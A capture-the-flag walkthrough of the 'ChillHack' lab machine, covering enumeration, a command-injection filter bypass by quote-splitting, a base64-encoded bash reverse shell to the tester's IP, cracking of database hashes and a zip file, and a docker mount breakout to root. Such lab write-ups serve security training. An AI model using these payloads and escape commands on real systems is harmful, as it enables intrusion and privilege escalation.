ChillHack

Target IP: 10.10.167.84


Scanning

5ce32e1d020cbe4af684c0486ae08651.png
There are three TCP ports open on the target machine: FTP, SSH, and HTTP. I will start enumeration with the FTP as it allows anonymous login.


Enumeration

Port 21: FTP
81e268bc84280bbdaed62d0d0c11db2b.png
This FTP application allows anonymous login. There is a text file called note.txt which contains the content shown above. The file hints two usernames anurodh and apaar, and the web application is using filtering.

Port 80: HTTP
0aed486fa212aa85257724e76d73be39.png
The webpage above is displayed for this application.

945b9f818b28101161dcbadf1aca4fd2.png
I performed a directory search using the command gobuster dir -u http://10.10.167.84/ -w /usr/share/wordlists/dirb/big.txt -x php,html,txt and obtained the result above. There is an interesting page called /secret/index.php.

aa87c90805c35128fc06c7d8209cf4bb.png
Browsing to /secret/index.php displays the page above. It allows command execution. Is the target machine vulnerable to command execution?

d4b85e1266d83181979edc52bd4f4b79.png
Performing commands such as ls is prohibited, as the message above is shown and the command is not executed. But there are numerous ways to bypass this!

03471159de4b6badf2ef21ab5f32b1cd.png
Command ls is not allowed, but using l's' is allowed as it bypasses the filter.

9d34e35b44f6c333e87773b1cb8ac2f9.png
I used the payload c'a't index.php to read the source code of this page to identify the whitelist and blacklist filters in place, and received the output above when I viewed the source code. The blacklist filter in place gives a lot of information. This blacklist filter is very simple and can be bypassed many ways, such as using even number of ' between commands.


Exploitation

6e0effb1e0162fdb02be0181e18cdc5a.png

I used the payload /bin/bash -i >& /dev/tcp/10.14.55.153/8443 0>&1. I encoded this payload in base64 to receive L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjE0LjU1LjE1My84NDQzIDA+JjE=. Then I prefixed it with echo and suffixed it with |base64 -d | bash. I started a listener on port 8443, sent the payload, and received a reverse shell connection from the target machine. Now I have a foothold on the machine. The full payload is shown below.

echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjE0LjU1LjE1My84NDQzIDA+JjE='| base64 -d | b'a'sh
echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjE0LjU1LjE1My84NDQzIDA+JjE='| base64 -d | b'a'sh

Privilege Escalation

9ea711db2e5d7d0e1706ef619c11886c.png
f841817c3403f71075842acdeb352f28.png
Looks like /home/apaar/.helpline.sh can be executed with sudo as apaar.
9219e828432f40debad4d41ed406eb95.png
Now I have a shell as apaar. I entered /bin/sh and then python3 -c 'import pty; pty.spawn("/bin/bash");' to spawn an interactive Python shell. The $msg 2>/dev/null is responsible for command execution.

e7418b8e92d66eaf5a1d3b00ef386ca5.png
The /var/www/files/index.php files contains the credential root:!@m+her00+@db.

0d7de0c884adb9b2ab531e583afaf7ab.png
And now I have access to the MySQL application using the credentials above.

715b0d27f715999ef9c1cadadd9737f2.png
There is an interesting database called webportal with the table users. This table contains the entries shown above.

c3c56ba44b69e69bdf86cbfacd3755d9.png
I copied the two password hashes in a text file called hash and ran john on it. I obtained the passwords above. However, spraying these credentials against the different users did not work.

649c376980835a84a3c9ea56507c4b66.png
This hacker.php gives us a hint about the image.

093cee47ad0a9bae96a1431e787889d8.png
There is an interesting directory with images. I started a Python HTTP server on the target machine, and downloaded the two files on my local machine.

67da820ad2e397c32d88eadf4eb797ee.png
5e930bb3c809157d20042d9371538411.png
The image contains a zip file called backup.zip. But it is password protected. Using john, I obtained the hash of this file and cracked it. The password I received is pass1word.

2a80fcb2e235261705e47d58521e0a7f.png
I extracted the file source_code.php. This file contains the information above. The password of the user anurodh is encoded in base64.

23e495faa5a443cbb9b5fad2224bd157.png
After decoding it, I obtained the password !d0ntKn0wmYp@ssw0rd. I used this to login to SSH.

e3cd8ac4edfed607b633e78d033e974f.png
Running id shows the user is a group of docker. And I used the command docker run -v /:/mnt --rm -it alpine chroot /mnt sh to break out of the docker. Now I have a root shell. GG.


Flags

2427b7e27efff36860f64b6aff29234b.png
The local.txt flag once I escalated my privileges to apaar.

3a36ea419237b0381cc0af5f5758907b.png
The proof.txt flag.